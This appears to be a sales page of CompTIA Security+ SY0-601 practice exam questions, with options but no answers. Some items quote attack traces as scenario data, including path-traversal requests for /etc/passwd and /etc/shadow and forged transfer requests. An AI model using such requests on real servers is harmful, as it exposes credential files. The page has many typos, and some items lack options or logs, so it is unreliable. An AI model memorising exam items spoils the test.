Summer Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: takeit60

SY0-601 CompTIA Security+ Exam 2021 Questions and Answers

Questions 4

A Chief Information Security Officer (CISO) wants to implement a new solution that can protect against certain categories of websites, whether the employee is in the offer or away. Which of the following solutions should the CISO implement?

Options:

A.

VAF

B.

SWG

C.

VPN

D.

WDS

Buy Now
Questions 5

A company is enhancing the security of the wireless network and needs to ensure only employees with a valid certificate can authenticate to the network. Which of the following should the

company implement?

Options:

A.

PEAP

B.

PSK

C.

WPA3

D.

WPS

Buy Now
Questions 6

A financial institution recently joined a bug bounty program to identify security issues in the institution's new public platform. Which of the following best describes who the institution is working with to identify security issues?

Options:

A.

Script kiddie

B.

Insider threats

C.

Malicious actor

D.

Authorized hacker

Buy Now
Questions 7

Which of the following should customers who are involved with Ul developer agreements be concerned with when considering the use of these products on highly sensitive projects?

Options:

A.

Weak configurations

B.

Integration activities

C.

Unsecure user accounts

D.

Outsourced code development

Buy Now
Questions 8

Which of the following types of controls is a turnstile?

Options:

A.

Physical

B.

Detective

C.

Corrective

D.

Technical

Buy Now
Questions 9

Which of the following is a solution that can be used to stop a disgruntled employee from copying confidential data to a USB drive?

Options:

A.

DLP

B.

TLS

C.

AV

D.

IDS

Buy Now
Questions 10

Which ol the following is required in order (or an IDS and a WAF to be effective on HTTPS traffic?

Options:

A.

Hashing

B.

DNS sinkhole

C.

TLS inspection

D.

Data masking

Buy Now
Questions 11

A data owner has been tasked with assigning proper data classifications and destruction methods for various types of data contained within the environment.

Options:

Buy Now
Questions 12

A company a "right to forgotten" request To legally comply, the company must remove data related to the requester from its systems. Which Of the following Company most likely complying with?

Options:

A.

NIST CSF

B.

GDPR

C.

PCI OSS

D.

ISO 27001

Buy Now
Questions 13

A major manufacturing company updated its internal infrastructure and just started to allow OAuth application to access corporate data Data leakage is being reported Which of following most likely caused the issue?

Options:

A.

Privilege creep

B.

Unmodified default

C.

TLS

D.

Improper patch management

Buy Now
Questions 14

The concept of connecting a user account across the systems of multiple enterprises is best known as:

Options:

A.

federation

B.

a remote access policy.

C.

multifactor authentication

D.

single sign-on.

Buy Now
Questions 15

An analyst is working on an email security incident in which the target opened an attachment containing a worm. The analyst wants to Implement mitigation techniques to prevent further spread. Which of the following is the best course of action for the analyst to take?

Options:

A.

Apply a DLP solution.

B.

Implement network segmentation.

C.

Utilize email content filtering.

D.

Isolate the infected attachment.

Buy Now
Questions 16

A candidate attempts to go to but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following best describes this type of attack?

Options:

A.

Reconnaissance

B.

Impersonation

C.

Typosquatting

D.

Watering-hole

Buy Now
Questions 17

Which of the following is the correct order of volatility from most to least volatile?

Options:

A.

Memory, temporary filesystems. routing tables, disk, network storage

B.

Cache, memory, temporary filesystems. disk, archival media

C.

Memory, disk, temporary filesystems. cache, archival media

D.

Cache, disk, temporary filesystems. network storage, archival media

Buy Now
Questions 18

A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources. Which of the following types of attacks is the user MOST likely experiencing?

Options:

A.

Bluejacking

B.

Jamming

C.

Rogue access point

D.

Evil twin

Buy Now
Questions 19

Which of the following should be addressed first on security devices before connecting to the network?

Options:

A.

Open permissions

B.

Default settings

C.

API integration configuration

D.

Weak encryption

Buy Now
Questions 20

Several users have been violating corporate security policy by accessing inappropriate Sites on corporate-issued mobile devices while off campus. The senior leadership team wants all mobile devices to be hardened with controls that:

  • Limit the sites that can be accessed

  • Only allow access to internal resources while physically on campus.

  • Restrict employees from downloading images from company email

Whip of the following controls would best address this situation? (Select two).

Options:

A.

MFA

B.

GPS tagging

C.

Biometric authentication

D.

Content management

E.

Geofencing

F.

Screen lock and PIN requirements

Buy Now
Questions 21

A user's login credentials were recently compromised During the investigation, the security analyst determined the user input credentials into a pop-up window when prompted to confirm the username and password However the trusted website does not use a pop-up for entering user colonials Which of the following attacks occurred?

Options:

A.

Cross-site scripting

B.

SOL injection

C.

DNS poisoning

D.

Certificate forgery

Buy Now
Questions 22

During an assessment, a systems administrator found several hosts running FTP and decided to immediately block FTP communications at the firewall. Which of the following describes the

greatest risk associated with using FTP?

Options:

A.

Private data can be leaked

B.

FTP is prohibited by internal policy.

C.

Users can upload personal files

D.

Credentials are sent in cleartext.

Buy Now
Questions 23

Which Of the following is the best method for ensuring non-repudiation?

Options:

A.

SSO

B.

Digital certificate

C.

Token

D.

SSH key

Buy Now
Questions 24

A network engineer is troubleshooting wireless network connectivity issues that were reported by users The issues are occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas of the building There have also been reports of users being required to enter their credentials on web pages in order to gain access to them Which of the following is the most likely cause of this issue?

Options:

A.

An external access point is engaging in an evil-Twin attack

B.

The signal on the WAP needs to be increased in that section of the building

C.

The certificates have expired on the devices and need to be reinstalled

D.

The users in that section of the building are on a VLAN that is being blocked by the firewall

Buy Now
Questions 25

Which of the following cloud models provides clients with servers, storage, and networks but nothing else?

Options:

A.

SaaS

B.

PaaS

C.

laaS

D.

DaaS

Buy Now
Questions 26

Law enforcement officials sent a company a notification that states electronically stored information and paper documents cannot be destroyed. Which of the following explains this process?

Options:

A.

Data breach notification

B.

Accountability

C.

Legal hold

D.

Chain of custody

Buy Now
Questions 27

Which Of the following best ensures minimal downtime for organizations vÄh crit-ical computing equipment located in earthquake-prone areas?

Options:

A.

Generators and UPS

B.

Off-site replication

C.

Additional warm site

D.

Local

Buy Now
Questions 28

An organization's corporate offices were destroyed due to a natural disaster, so the organization is now setting up offices in a temporary work space. Which of the following will the organization most likely consult?

Options:

A.

The business continuity plan

B.

The risk management plan

C.

The communication plan

D.

The incident response plan

Buy Now
Questions 29

A security engineer needs to recommend a solution to defend against malicious actors misusing protocols and being allowed through network defenses. Which of the following will the engineer most likely recommended?

Options:

A.

A content filter

B.

AWAF

C.

A next-generation firewall

D.

An IDS

Buy Now
Questions 30

A malicious actor recently penetrated a company's network and moved laterally to the data center Upon investigation a forensics firm wants to know what was in the memory on the compromised server Which of the following files should be given to the forensics firm?

Options:

A.

Security

B.

Application

C.

Dump

D.

Syslog

Buy Now
Questions 31

Which of the following supplies non-repudiation during a forensics investigation?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive with dd

C.

Using a SHA-2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Buy Now
Questions 32

A user enters a password to log in to a workstation and is then prompted to enter an authentication code Which of the following MFA factors or attributes are being utilized in the authentication process? {Select two).

Options:

A.

Something you know

B.

Something you have

C.

Somewhere you are

D.

Someone you know

E.

Something you are

F.

Something you can do

Buy Now
Questions 33

After multiple on-premises security solutions were migrated to the cloud, the incident response time increased The analysts are spending a long time trying to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to optimize the incident response time?

Options:

A.

CASB

B.

VPC

C.

SWG

D.

CMS

Buy Now
Questions 34

A company's help desk has received calls about the wireless network being down and users being unable to connect to it The network administrator says all access points are up and running One of the help desk technicians notices the affected users are working in a building near the parking lot. Which of the following is the most likely reason for the outage?

Options:

A.

Someone near the building is jamming the signal

B.

A user has set up a rogue access point near the building

C.

Someone set up an evil twin access point in the affected area.

D.

The APs in the affected area have been unplugged from the network

Buy Now
Questions 35

A company wants the ability to restrict web access and monitor the websites that employees visit, Which Of the following would best meet these requirements?

Options:

A.

Internet Proxy

B.

VPN

C.

WAF

D.

Firewall

Buy Now
Questions 36

Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?

Options:

A.

Compensating control

B.

Network segmentation

C.

Transfer of risk

D.

SNMP traps

Buy Now
Questions 37

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

Options:

A.

SMIME

B.

LDAPS

C.

SSH

D.

SRTP

Buy Now
Questions 38

An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and SFTP, and to specifically block FTP. Which of the following would BEST accomplish this goal?

Options:

A.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 67 -Allow: Any Any 68 -Allow: Any Any 22 -Deny: Any Any 21 -Deny: Any Any

B.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 67 -Allow: Any Any 68 -Deny: Any Any 22 -Allow: Any Any 21 -Deny: Any Any

C.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 22 -Deny: Any Any 67 -Deny: Any Any 68 -Deny: Any Any 21 -Allow: Any Any

D.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Deny: Any Any 67 -Allow: Any Any 68 -Allow: Any Any 22 -Allow: Any Any 21 -Allow: Any Any

Buy Now
Questions 39

A security analyst discovers that a company's username and password database were posted on an internet forum. The usernames and passwords are stored in plaintext. Which of the following would mitigate the damage done by this type of data exfiltration in the future?

Options:

A.

Create DLP controls that prevent documents from leaving the network.

B.

Implement salting and hashing.

C.

Configure the web content filter to block access to the forum.

D.

Increase password complexity requirements.

Buy Now
Questions 40

A company completed a vulnerability scan. The scan found malware on several systems that were running older versions of Windows. Which of the following is MOST likely the cause of the malware infection?

Options:

A.

Open permissions

B.

Improper or weak patch management

C.

Unsecure root accounts

D.

Default settings

Buy Now
Questions 41

An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Select TWO).

Options:

A.

MAC filtering

B.

Zero trust segmentation

C.

Network access control

D.

Access control vestibules

E.

Guards

F.

Bollards.

Buy Now
Questions 42

Leveraging the information supplied below, complete the CSR for the server to set up TLS (HTTPS)

• Hostname: ws01

• Domain: comptia.org

• IPv4: 10.1.9.50

• IPV4: 10.2.10.50

• Root: home.aspx

• DNS CNAME:homesite.

Instructions:

Drag the various data points to the correct locations within the CSR. Extension criteria belong in the let hand column and values belong in the corresponding row in the right hand column.

Options:

Buy Now
Questions 43

A security engineer is investigating a penetration test report that states the company website is vulnerable to a web application attack. While checking the web logs from the time of the test, the engineer notices several invalid web form submissions using an unusual address: "SELECT * FROM customername”. Which of the following is most likely being attempted?

Options:

A.

Directory traversal

B.

SQL injection

C.

Privilege escalation

D.

Cross-site scripting

Buy Now
Questions 44

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

Options:

A.

nmap

B.

tracert

C.

ping

D.

ssh

Buy Now
Questions 45

An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO most likely use?

Options:

A.

An external security assessment

B.

A bug bounty program

C.

A tabletop exercise

D.

A red-team engagement

Buy Now
Questions 46

A company is auditing the manner in which its European customers’ personal information is handled. Which of the following should the company consult?

Options:

A.

GDPR

B.

ISO

C.

NIST

D.

PCI DSS

Buy Now
Questions 47

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

Options:

A.

HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

B.

HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

C.

HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

D.

HTTPS://".comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

Buy Now
Questions 48

An analyst is concerned about data leaks and wants to restrict access to internet services to authorized users only. The analyst also wants to control the actions each user can perform on each service. Which of the following would be the best technology for the analyst to consider implementing?

Options:

A.

DLP

B.

VPC

C.

CASB

D.

Content filtering

Buy Now
Questions 49

Which of the following is used to validate a certificate when it is presented to a user?

Options:

A.

OCSP

B.

CSR

C.

CA

D.

CRC

Buy Now
Questions 50

A security analyst receives alerts about an internal system sending a large amount of unusual DNS queries to systems on the internet over short periods of time during non-business hours. Which of the following is most likely occurring?

Options:

A.

A worm is propagating across the network.

B.

Data is being exfiltrated.

C.

A logic bomb is deleting data.

D.

Ransomware is encrypting files.

Buy Now
Questions 51

An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to resolve this issue. Which of the following options offer low-cost solutions? (Select two).

Options:

A.

Warm site

B.

Generator

C.

Hot site

D.

Cold site

E.

Cloud backups

F.

UPS

Buy Now
Questions 52

Several universities are participating in a collaborative research project and need to share compute and storage resources. Which of the following cloud deployment strategies would best meet this need?

Options:

A.

Community

B.

Private

C.

Public

D.

Hybrid

Buy Now
Questions 53

A security analyst is reviewing SIEM logs during an ongoing attack and notices the following:

http://company.com/get php? f=/etc/passwd

http://company.com/..%2F. .42F..42F.. $2Fetct2Fshadow

http: //company.com/../../../ ../etc/passwd

Which of the following best describes the type of attack?

Options:

A.

SQLi

B.

CSRF

C.

API attacks

D.

Directory traversal

Buy Now
Questions 54

The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business hours, including during a pandemic or crisis. However, the CEO is concerned that

some staff members may take advantage of the flexibility and work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer believes the company

can implement some basic controls to mitigate the majority of the risk. Which of the following would be best to mitigate the CEO's concerns? (Select two).

Options:

A.

Geolocation

B.

Time-of-day restrictions

C.

Certificates

D.

Tokens

E.

Geotagging

F.

Role-based access controls

Buy Now
Questions 55

A security administrator recently used an internal CA to issue a certificate to a public application. A user tries to reach the application but receives a message stating, “Your connection is not private." Which of the following is the best way to fix this issue?

Options:

A.

Ignore the warning and continue to use the application normally.

B.

Install the certificate on each endpoint that needs to use the application.

C.

Send the new certificate to the users to install on their browsers.

D.

Send a CSR to a known CA and install the signed certificate on the application's server.

Buy Now
Questions 56

A security architect at a large, multinational organization is concerned about the complexities and overhead of managing multiple encryption keys securely in a multicioud provider

environment. The security architect is looking for a solution with reduced latency to allow the incorporation of the organization's existing keys and to maintain consistent, centralized control

and management regardless of the data location. Which of the following would best meet the architect's objectives?

Options:

A.

Trusted Platform Module

B.

laaS

C.

HSMaas

D.

PaaS

Buy Now
Questions 57

A dynamic application vulnerability scan identified that code injection could be performed using a web form. Which of the following will be the best remediation to prevent this vulnerability?

Options:

A.

Implement input validations

B.

Deploy UFA

C.

Utilize a WAF

D.

Conjure HIPS

Buy Now
Questions 58

A large financial services firm recently released information regarding a security breach within its corporate network that began several years before. During the time frame in which the breach occurred, indicators show an attacker gained administrative access to the network through a file downloaded from a social media site and subsequently installed it without the user's knowledge. Since the compromise, the attacker was able to take command and control of the computer systems anonymously while obtaining sensitive corporate and personal employee information. Which of the following methods did the attacker most likely use to gain access?

Options:

A.

A bol

B.

A fileless virus

C.

A logic bomb

D.

A RAT

Buy Now
Questions 59

The IT department's on-site developer has been with the team for many years. Each lime an application is released; the security team is able to identify multiple vulnerabilities Which of the Mowing would best help the team ensure the application is ready to be released to production?

Options:

A.

Limit the use of third-party libraries.

B.

Prevent data exposure queries.

C.

Obfuscate the source code

D.

Submit the application to OA before releasing it.

Buy Now
Questions 60

A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. Which of the following documents would the third-party vendor

most likely be required to review and sign?

Options:

A.

SLA

B.

NDA

C.

MOU

D.

AUP

Buy Now
Questions 61

Which of the following teams combines both offensive and defensive testing techniques to protect an organization's critical systems?

Options:

A.

Red

B.

Blue

C.

Purple

D.

Yellow

Buy Now
Questions 62

A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing?

Options:

A.

Cross-site scripting

B.

Buffer overflow

C.

Jailbreaking

D.

Side loading

Buy Now
Questions 63

An annual information security has revealed that several OS-level configurations are not in compliance due to Outdated hardening standards the company is using Which Of the following would be best to use to update and reconfigure the OS.level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Buy Now
Questions 64

Which of the following holds staff accountable while escorting unauthorized personnel?

Options:

A.

Locks

B.

Badges

C.

Cameras

D.

Visitor logs

Buy Now
Questions 65

Which of the following can best protect against an employee inadvertently installing malware on a company system?

Options:

A.

Host-based firewall

B.

System isolation

C.

Least privilege

D.

Application allow list

Buy Now
Questions 66

A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

Options:

A.

Setting an explicit deny to all traffic using port 80 instead of 443

B.

Moving the implicit deny from the bottom of the rule set to the top

C.

Configuring the first line in the rule set to allow all traffic

D.

Ensuring that port 53 has been explicitly allowed in the rule set

Buy Now
Questions 67

A company was recently breached Pan of the company's new cybersecurity strategy is to centralize? the togs horn all security devices Which of the following components forwards the logs to a central source?

Options:

A.

Log enrichment

B.

Log queue

C.

Log parser

D.

Log collector

Buy Now
Questions 68

Which Of the following supplies non-repudiation during a forensics investiga-tion?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive With dd

C.

a SHA 2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Buy Now
Questions 69

A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the company’s mobile application. After reviewing the back-end server logs, the security analyst finds the following entries:

Which of the following is the most likely cause of the security control bypass?

Options:

A.

IP address allow list

B.

User-agent spoofing

C.

WAF bypass

D.

Referrer manipulation

Buy Now
Questions 70

Which of the following security design features can an development team to analyze the deletion eoting Of data sets the copy?

Options:

A.

Stored procedures

B.

Code reuse

C.

Version control

D.

Continunus

Buy Now
Questions 71

An analyst is working on an investigation with multiple alerts for multiple hosts. The hosts are showing signs of being compromised by a fast-spreading worm. Which of the following should be the next step in order to stop the spread?

Options:

A.

Disconnect every host from the network.

B.

Run an AV scan on the entire

C.

Scan the hosts that show signs of

D.

Place all known-infected hosts on an isolated network

Buy Now
Questions 72

You are security administrator investigating a potential infection on a network.

Click on each host and firewall. Review all logs to determine which host originated the Infecton and then deny each remaining hosts clean or infected.

Options:

Buy Now
Questions 73

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO's report?

Options:

A.

Insider threat

B.

Hacktivist

C.

Nation-state

D.

Organized crime

Buy Now
Questions 74

A security analyst discovers several jpg photos from a cellular phone during a forensics investigation involving a compromised system The analyst runs a forensics tool to gather file metadata Which of the following would be part of the images if all the metadata is still intact?

Options:

A.

The GSS location

B.

When the file was deleted

C.

The total number of print jobs

D.

The number of copies made

Buy Now
Questions 75

During a recent penetration test, a tester plugged a laptop into an Ethernet port in an unoccupied conference room and obtained a valid IP address. Which of the following would have best prevented this avenue of attack?

Options:

A.

Enabling MAC address filtering

B.

Moving printers inside a firewall

C.

Implementing 802.IX

D.

Using network port security

Buy Now
Questions 76

During an incident, an EDR system detects an increase in the number of encrypted outbound connections from multiple hosts. A firewall is also reporting an increase in outbound connections that use random high ports. An

analyst plans to review the correlated logs to find the source of the incident. Which of the following tools will best assist the analyst?

Options:

A.

A vulnerability scanner

B.

A NGFW

C.

The Windows Event Viewer

D.

A SIEM

Buy Now
Questions 77

Which of the following is an administrative control that would be most effective to reduce the occurrence of malware execution?

Options:

A.

Security awareness training

B.

Frequency of NIDS updates

C.

Change control procedures

D.

EDR reporting cycle

Buy Now
Questions 78

A security analyst it investigating an incident to determine what an attacker was able to do on a compromised Laptop. The analyst reviews the following SIEM log:

Which of the following describes the method that was used to compromise the laptop?

Options:

A.

An attacker was able to move laterally from PC 1 to PC2 using a pass-the-hash attach

B.

An attacker was able to bypass the application approve list by emailing a spreadsheet. attachment with an embedded PowerShell in the file.

C.

An attacker was able to install malware to the CAasdf234 folder and use it to gain administrator rights and launch Outlook

D.

An attacker was able to phish user credentials successfully from an Outlook user profile

Buy Now
Questions 79

A company is expanding its threat surface program and allowing individuals to security test the company's internet-facing application. The company will compensate researchers based on the vulnerabilities discovered. Which of the following best describes the program the company is setting up?

Options:

A.

Open-source intelligence

B.

Bug bounty

C.

Red team

D.

Penetration testing

Buy Now
Questions 80

An organization is concerned that ils hosted web servers are not running the most updated version of the software. Which of the following would work best to help identify potential vulnerabilities?

Options:

A.

hping3 -S compcia.org -p 80

B.

nc -1 -v comptia.crg -p 80

C.

nmap comptia.org -p 80 -sv

D.

nslookup -port«80 comptia.org

Buy Now
Questions 81

Recent changes to a company's BYOD policy require all personal mobile devices to use a two-factor authentication method that is not something you know or have. Which of the following will meet this requirement?

Options:

A.

Facial recognition

B.

Six-digit PIN

C.

PKI certificate

D.

Smart card

Buy Now
Questions 82

A wet-known organization has been experiencing attacks from APTs. The organization is concerned that custom malware is being created and emailed into the company or installed on USB stocks that are dropped in parking lots. Which of the following is the best defense against this scenario?

Options:

A.

Configuring signature-based antivirus to update every 30 minutes

B.

Enforcing S/MIME for email and automatically encrypting USB drives upon assertion

C.

Implementing application execution in a sandbox for unknown software

D.

Fuzzing new files for vulnerabilities if they are not digitally signed

Buy Now
Questions 83

A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works best until a proper fix is released?

Options:

A.

Detective

B.

Compensating

C.

Deterrent

D.

Corrective

Buy Now
Questions 84

A threat actor used a sophisticated attack to breach a well-known ride-sharing. company. The threat actor posted on social media that this action was in response to the company's treatment of its drivers Which of the following best describes tm type of throat actor?

Options:

A.

Nation-slate

B.

Hacktivist

C.

Organized crime

D.

Shadow IT

Buy Now
Questions 85

A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area. Which of the following would most likely have prevented this breach?

Options:

A.

A firewall

B.

A device pin

C.

A USB data blocker

D.

Biometrics

Buy Now
Questions 86

A help desk technician receives a phone call from someone claiming to be a part of the organization's cybersecurity incident response team. The caller asks the technician to verify the network's internal firewall IP address. Which of the following is the technician's best course of action?

Options:

A.

Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller.

B.

Ask for the caller's name, verify the person's identity in the email directory, and provide the requested information over the phone.

C.

Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the organization's cybersecurity officer.

D.

Request the caller send an email for identity verification and provide the requested information via email to the caller.

Buy Now
Questions 87

The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The systems administrator researched the vulnerability and discovered the domain controller

does not run the associated application with the vulnerability. Which of the following steps should the administrator take next?

Options:

A.

Ensure the scan engine is configured correctly.

B.

Apply a patch to the domain controller.

C.

Research the CVE.

D.

Document this as a false positive.

Buy Now
Questions 88

A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible section of the company's website. The malicious actor posted an entry in an attempt to trick users into clicking the following:

Which of the following was most likely observed?

Options:

A.

DLL injection

B.

Session replay

C.

SQLi

D.

xss

Buy Now
Questions 89

A security analyst is reviewing the output of a web server log and notices a particular account is attempting to transfer large amounts of money:

GET http://yourbank.com/transfer.do?acctnum=08764 6959 &amount=500000 HTTP/1.1

GET http://yourbank.com/transfer.do?acctnum=087646958 &amount=5000000 HTTP/1.1

GET http://yourbank.com/transfer.do?acctnum=-087646958 &amount=1000000 HTTP/1.1

GET http://yourbank.com/transfer.do?acctnum=087646953 &amount=500 HTTP/1.1

Which of the following types of attacks is most likely being conducted?

Options:

A.

SQLi

B.

CSRF

C.

Spear phishing

D.

API

Buy Now
Questions 90

The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer is an example of a:

Options:

A.

data controller

B.

data owner.

C.

data custodian.

D.

data processor

Buy Now
Questions 91

Historically, a company has had issues with users plugging in personally owned removable media devices into corporate computers. As a result, the threat of malware incidents is almost

constant. Which of the following would best help prevent the malware from being installed on the computers?

Options:

A.

AUP

B.

NGFW

C.

DLP

D.

EDR

Buy Now
Questions 92

A secondly administration is trying to determine whether a server is vulnerable to a range of attacks After using a tool, the administrator obtains the following output.

Which of the following attacks was successfully implemented based on the output?

Options:

A.

Memory leak

B.

Race condition

C.

SQL injection

D.

Directory traversal

Buy Now
Questions 93

Developers are writing code and merging it into shared repositories several times a day. where it is tested automatically. Which of the following concepts does this best represent?

Options:

A.

Functional testing

B.

Stored procedures

C.

Elasticity

D.

Continuous Integration

Buy Now
Questions 94

An organization is having difficulty correlating events from its individual AV. EDR. DLP. SWG. WAF, MDM. HIPS, and CASB systems. Which of the following is the best way to improve the situation?

Options:

A.

Remove expensive systems that generate few alerts.

B.

Modify the systems to alert only on critical issues.

C.

Utilize a SIEM to centralize logs and dashboards.

D.

Implement a new syslog/NetFlow appliance.

Buy Now
Questions 95

A security analyst receives a SIEM alert that someone logged in to the app admin test account, which is only used for the early detection of attacks. The security analyst then reviews the following application log:

Which of the following can the security analyst conclude?

Options:

A.

A replay attack is being conducted against the application.

B.

An injection attack is being conducted against a user authentication system.

C.

A service account password may have been changed, resulting in continuous failed logins within the application.

D.

A credentialed vulnerability scanner attack is testing several CVEs against the application.

Buy Now
Questions 96

Which of the following scenarios describes a possible business email compromise attack?

Options:

A.

An employee receives a gift card request m an email that has an executive's name m the display held to the email

B.

Employees who open an email attachment receive messages demanding payment m order to access files

C.

A service desk employee receives an email from the HR director asking for log-in credentials lo a cloud administrator account

D.

An employee receives an email with a link to a phishing site that is designed to look like the company's email portal.

Buy Now
Questions 97

A network engineer receives a call regarding multiple LAN-connected devices that are on the same switch. The devices have suddenly been experiencing speed and latency issues while connecting to network resources. The engineer enters the command show mac address-table and reviews the following output

Which of the following best describes the attack that is currently in progress?

Options:

A.

MAC flooding

B.

Evil twin

C.

ARP poisoning

D.

DHCP spoofing

Buy Now
Questions 98

A security engineer updated an application on company workstations. The application was running before the update, but it is no longer launching successfully. Which of the following most likely needs to be updated?

Options:

A.

Blocklist

B.

Deny list

C.

Quarantine list

D.

Approved fist

Buy Now
Questions 99

An organization recently completed a security control assessment The organization determined some controls did not meet the existing security measures. Additional mitigations are needed to lessen the risk of the non-complaint controls. Which of the following best describes these

mitigations?

Options:

A.

Corrective

B.

Compensating

C.

Deterrent

D.

Technical

Buy Now
Questions 100

A company recently upgraded its authentication infrastructure and now has more computing power. Which of the following should the company consider using to ensure user credentials are

being transmitted and stored more securely?

Options:

A.

Blockchain

B.

Salting

C.

Quantum

D.

Digital signature

Buy Now
Questions 101

Security engineers are working on digital certificate management with the top priority of making administration easier. Which of the following certificates is the best option?

Options:

A.

User

B.

Wildcard

C.

Self-signed

D.

Root

Buy Now
Questions 102

Which of the following measures the average time that equipment will operate before it breaks?

Options:

A.

SLE

B.

MTBF

C.

RTO

D.

ARO

Buy Now
Questions 103

A company needs to enhance Its ability to maintain a scalable cloud Infrastructure. The Infrastructure needs to handle the unpredictable loads on the company's web application. Which of the following

cloud concepts would BEST these requirements?

Options:

A.

SaaS

B.

VDI

C.

Containers

D.

Microservices

Buy Now
Questions 104

A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?

Options:

A.

POP

B.

IPSec

C.

IMAP

D.

PGP

Buy Now
Questions 105

Which of the following would most likely include language prohibiting end users from accessing personal email from a company device?

Options:

A.

SLA

B.

BPA

C.

NDA

D.

AUP

Buy Now
Questions 106

A user is trying unsuccessfully to send images via SMS. The user downloaded the images from a corporate email account on a work phone. Which of the following policies is preventing the user from completing this action?

Options:

A.

Application management

B.

Content management

C.

Containerization

D.

Full disk encryption

Buy Now
Questions 107

A manager for the development team is concerned about reports showing a common set of vulnerabilities. The set of vulnerabilities is present on almost all of the applications developed by the team. Which of the following approaches would be most effective for the manager to use to

address this issue?

Options:

A.

Tune the accuracy of fuzz testing.

B.

Invest in secure coding training and application security guidelines.

C.

Increase the frequency of dynamic code scans 1o detect issues faster.

D.

Implement code signing to make code immutable.

Buy Now
Questions 108

An attacker is targeting a company. The attacker notices that the company’s employees frequently access a particular website. The attacker decides to infect the website with malware and hopes the employees’ devices will also become infected. Which of the following techniques is the attacker using?

Options:

A.

Watering-hole attack

B.

Pretexting

C.

Typosquatting

D.

Impersonation

Buy Now
Questions 109

A backup operator wants to perform a backup to enhance the RTO and RPO in a highly time- and storage-efficient way that has no impact on production systems. Which of the following backup types should the operator use?

Options:

A.

Tape

B.

Full

C.

Image

D.

Snapshot

Buy Now
Questions 110

A company recently added a DR site and is redesigning the network. Users at the DR site are having issues browsing websites.

INSTRUCTIONS

Click on each firewall to do the following:

1. Deny cleartext web traffic

2. Ensure secure management protocols are used.

3. Resolve issues at the DR site.

The ruleset order cannot be modified due to outside constraints.

Hat any time you would like to bring back the initial state of the simulation, please dick the Reset All button.

Options:

Buy Now
Questions 111

While reviewing the /etc/shadow file, a security administrator notices files with the same values. Which of the following attacks should the administrator be concerned about?

Options:

A.

Plaintext

B.

Birthdat

C.

Brute-force

D.

Rainbow table

Buy Now
Questions 112

A security administrator Is managing administrative access to sensitive systems with the following requirements:

• Common login accounts must not be used (or administrative duties.

• Administrative accounts must be temporal in nature.

• Each administrative account must be assigned to one specific user.

• Accounts must have complex passwords.

• Audit trails and logging must be enabled on all systems.

Which of the following solutions should the administrator deploy to meet these requirements?

Options:

A.

ABAC

B.

SAML

C.

PAM

D.

CASB

Buy Now
Questions 113

A company recently completed the transition from data centers to the cloud. Which of the following solutions will best enable the company to detect security threats in applications that run in isolated environments within the cloud environment?

Options:

A.

Security groups

B.

Container security

C.

Virtual networks

D.

Segmentation

Buy Now
Questions 114

An employee received an email with an unusual file attachment named Updates . Lnk. A security analysts reverse engineering what the fle does and finds that executes the folowing script:

